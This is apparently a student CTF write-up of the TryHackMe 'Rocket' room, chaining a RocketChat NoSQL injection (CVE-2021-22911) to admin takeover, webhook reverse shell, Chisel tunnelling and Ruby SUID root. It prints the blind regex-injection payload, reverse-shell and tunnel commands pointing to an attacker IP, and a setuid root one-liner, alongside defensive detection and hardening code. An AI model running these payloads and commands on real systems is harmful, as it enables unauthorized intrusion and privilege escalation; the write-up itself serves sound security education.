# Ethical Hacking: Concepts & Practices - Final Project Report
A comprehensive penetration testing writeup for the Rocket vulnerable machine on TryHackMe, demonstrating exploitation of RocketChat 3.12.1 via NoSQL injection (CVE-2021-22911).
| Name |
|---|
| Hasnain Akhtar |
| Shayan Ahmed |
| Bilal Raza |
- Overview
- Vulnerabilities Exploited
- Attack Chain
- Tools Used
- Exploit Scripts
- Usage
- Detailed Methodology
- Remediation
- References
## Overview

This repository contains the exploit scripts and detailed report for compromising the "Rocket" machine on TryHackMe. The target system runs RocketChat version 3.12.1, which contains multiple critical vulnerabilities including NoSQL injection and authentication bypass flaws.
- ✅ Full administrative access to RocketChat
- ✅ Remote Code Execution (RCE) via malicious webhook integration
- ✅ Container escape and pivoting to host system
- ✅ Root-level privilege escalation via SUID binary exploitation
- ✅ Capture of both user and root flags
## Vulnerabilities Exploited

| Severity | Vulnerability | CVE |
|---|---|---|
| Critical | NoSQL Injection in Password Reset | CVE-2021-22911 |
| Critical | Authentication Bypass | CVE-2021-22911 |
| Critical | SUID Binary Exploitation (Ruby) | - |
| High | Bolt CMS File Upload | - |
| High | Weak/Default Credentials | - |
- CVSS Score: 9.8 (Critical)
- Affected Versions: RocketChat < 3.13, 3.12.x < 3.12.2, 3.11.x < 3.11.3
- Attack Vector: Network-based, no authentication required
- Impact: Complete system compromise through blind NoSQL injection in the password reset functionality
## Attack Chain

```text
┌─────────────────────────────────────────────────────────────────────────┐
│                               ATTACK FLOW                               │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  1. Reconnaissance                                                      │
│     └── Port Scan → Discover RocketChat on port 80                      │
│                                                                         │
│  2. NoSQL Injection (CVE-2021-22911)                                    │
│     └── Trigger password reset → Extract token via regex injection      │
│                                                                         │
│  3. Admin Account Takeover                                              │
│     └── Reset admin password using extracted token                      │
│                                                                         │
│  4. Remote Code Execution                                               │
│     └── Create malicious webhook integration → Trigger reverse shell    │
│                                                                         │
│  5. Container Escape                                                    │
│     └── Chisel tunneling → Pivot to host via Bolt CMS                   │
│                                                                         │
│  6. Privilege Escalation                                                │
│     └── Ruby SUID exploitation → Root access                            │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘
```
## Tools Used

| Category | Tools |
|---|---|
| Scanning | Nmap, WhatWeb, Gobuster |
| Exploitation | Custom Python exploits, Netcat |
| Post-Exploitation | LinPEAS, Chisel, ProxyChains |
| Credential Cracking | John the Ripper |
| Database | MongoDB CLI |
## Exploit Scripts

The primary exploit script, `detailed_exploit.py`, automates the full attack chain:

```bash
python3 detailed_exploit.py -u <low_priv_email> -a <admin_email> -t <target_url> -i <attacker_ip> -p <port>
```

Features:
- Automated password reset token extraction via blind NoSQL injection
- Admin password reset
- Webhook-based RCE for reverse shell
An alternative exploit, `cve_exploit.py`, with hardcoded configuration and additional 2FA bypass capabilities:

```bash
# Edit the configuration variables at the top of the script
python3 cve_exploit.py
```

Features:
- 2FA secret extraction (if enabled)
- TOTP code generation for 2FA bypass
- More verbose output for debugging
## Usage

```bash
# Install required Python packages
pip3 install requests pyotp
# For machines with 2FA enabled
pip3 install pyotp
```
- Connect to TryHackMe VPN:

  ```bash
  sudo openvpn <your_vpn_file>.ovpn
  ```

- Add target to hosts file:

  ```bash
  echo "<TARGET_IP> rocket.thm" | sudo tee -a /etc/hosts
  echo "<TARGET_IP> chat.rocket.thm" | sudo tee -a /etc/hosts
  ```

- Navigate to http://chat.rocket.thm
- Register a new account (use a temporary email service)
- Note down the email address
```bash
# Start a listener for the reverse shell (in a separate terminal)
nc -lvnp 4444

# Run the exploit against the target
python3 detailed_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i <YOUR_ATTACKER_IP> \
  -p 4444
```

Once you receive the reverse shell:
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
```

## Detailed Methodology

```bash
# Port scanning
nmap -sC -sV -p 22,80 -oN nmap_detailed.txt <TARGET_IP>
# Web fingerprinting
whatweb http://rocket.thm
# Directory enumeration
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt
```

The NoSQL injection vulnerability exists in the `getPasswordPolicy` endpoint. By using regex-based blind injection, we can extract the password reset token one character at a time:
```python
# %s is replaced with the token prefix recovered so far; whether the server accepts
# or rejects the call reveals if the guessed prefix matches, one character at a time.
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}'
```
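As an added illustration (not code from this report or from RocketChat), the JavaScript below models the server-side pattern behind this bug: a method handler that hands an untyped `token` parameter straight to a database lookup, beside a hardened handler that insists on a string. The in-memory collection, the `$regex` matcher and the handler names are constructed for the example.

```javascript
// Added example (not RocketChat's code): models the pattern behind CVE-2021-22911.
// The vulnerable handler passes a caller-controlled `token` straight into a
// database lookup, so an object such as {"$regex": "^A"} acts as a query operator
// and the accept/reject response becomes a one-character-at-a-time oracle.

// Constructed in-memory user collection standing in for MongoDB.
const users = [
  { _id: "u1", username: "admin",
    services: { password: { reset: { token: "Abc123xyz" } } } },
];

// Minimal matcher covering only the operator this example needs ($regex).
function valueMatches(stored, selector) {
  if (selector !== null && typeof selector === "object") {
    if (typeof selector.$regex === "string") {
      return new RegExp(selector.$regex).test(stored);
    }
    return false; // other operators are not modelled here
  }
  return stored === selector; // plain string: exact comparison
}

function findOneByResetToken(selector) {
  return users.find((u) => valueMatches(u.services.password.reset.token, selector));
}

// Vulnerable: no type check, so query operators reach the database.
function getPasswordPolicyVulnerable(params) {
  const user = findOneByResetToken(params.token);
  if (!user) throw new Error("invalid-token");
  return { enabled: true };
}

// Hardened: refuse anything that is not a plain string before querying.
function getPasswordPolicyHardened(params) {
  if (typeof params.token !== "string") throw new Error("invalid-token");
  const user = findOneByResetToken(params.token);
  if (!user) throw new Error("invalid-token");
  return { enabled: true };
}

// Returns true when the handler accepts the probe (a distinguishable response).
function accepts(handler, token) {
  try { handler({ token }); return true; } catch (e) { return false; }
}
```

The vulnerable handler answers differently for `{"$regex": "^A"}` and `{"$regex": "^B"}`, which is the oracle the blind injection relies on; the hardened one rejects both before any query runs.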
Container Escape via Chisel:

```bash
# On attacker machine
./chisel server -p 8000 --reverse -v
# On victim (container)
./chisel client <ATTACKER_IP>:8000 R:8081:172.17.0.4:8081
```
Privilege Escalation via Ruby SUID:

```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Exploit Ruby SUID
/usr/bin/ruby2.5 -e 'Process::Sys.setuid(0); exec "/bin/bash"'
```

## Remediation

| Priority | Action |
|---|---|
| Critical | Update RocketChat to version 3.18+ |
| Critical | Patch NoSQL injection vulnerabilities |
| High | Review and restrict SUID binaries |
| High | Implement strong password policies |
| Medium | Enable WAF and rate limiting |
| Medium | Implement network segmentation |
| Low | Deploy comprehensive logging/SIEM |
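An added example, not part of the original report, of the kind of check the WAF and logging items above could apply: it parses the method-call envelope used by the payload in the methodology section and flags any MongoDB operator key (`$regex` and friends) found inside `params`. The sample request bodies are constructed here.

```javascript
// Added detection example (not part of the original report). It inspects the
// request envelope used by the writeup's payload: an outer JSON object whose
// "message" field is itself a JSON-encoded method call with "msg", "method" and
// "params". Any key beginning with "$" inside params is a MongoDB operator and
// has no business in a password-reset token, so it is reported.

// Recursively collect dotted paths of keys that start with "$".
function findOperatorKeys(value, path = "", found = []) {
  if (Array.isArray(value)) {
    value.forEach((v, i) => findOperatorKeys(v, `${path}[${i}]`, found));
  } else if (value !== null && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      const p = path ? `${path}.${k}` : k;
      if (k.startsWith("$")) found.push(p);
      findOperatorKeys(v, p, found);
    }
  }
  return found;
}

// Inspect one request body. Returns null when clean or not a method envelope,
// otherwise { method, operators } describing what was found.
function inspectMethodCall(body) {
  let outer, inner;
  try {
    outer = JSON.parse(body);
    inner = JSON.parse(outer.message);
  } catch (e) {
    return null; // malformed, or not the envelope this check targets
  }
  if (!inner || inner.msg !== "method") return null;
  const operators = findOperatorKeys(inner.params, "params");
  return operators.length ? { method: inner.method, operators } : null;
}

// Constructed sample bodies: a legitimate string token and an operator probe.
const SAMPLES = [
  '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":\\"plain-token\\"}]}"}',
  '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^A\\"}}]}"}',
];

function scanSamples() {
  return SAMPLES.map(inspectMethodCall);
}
```

Paired with rate limiting, a finding like `params[0].token.$regex` on the password-reset path is a high-confidence signal of the extraction loop described in this writeup.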
## References

- TryHackMe - Rocket Room
- CVE-2021-22911 - MITRE
- OWASP - NoSQL Injection
- GTFOBins - Ruby
- Chisel - TCP/UDP Tunnel
- LinPEAS - Privilege Escalation
This writeup is for educational purposes only. The techniques demonstrated should only be used in authorized penetration testing engagements or on platforms like TryHackMe where explicit permission is granted. Unauthorized access to computer systems is illegal.
This project is licensed under the MIT License - see the report PDF for full documentation. If the PDF is used, it must be properly cited, with the repository name mentioned.
Happy Hacking! 🎯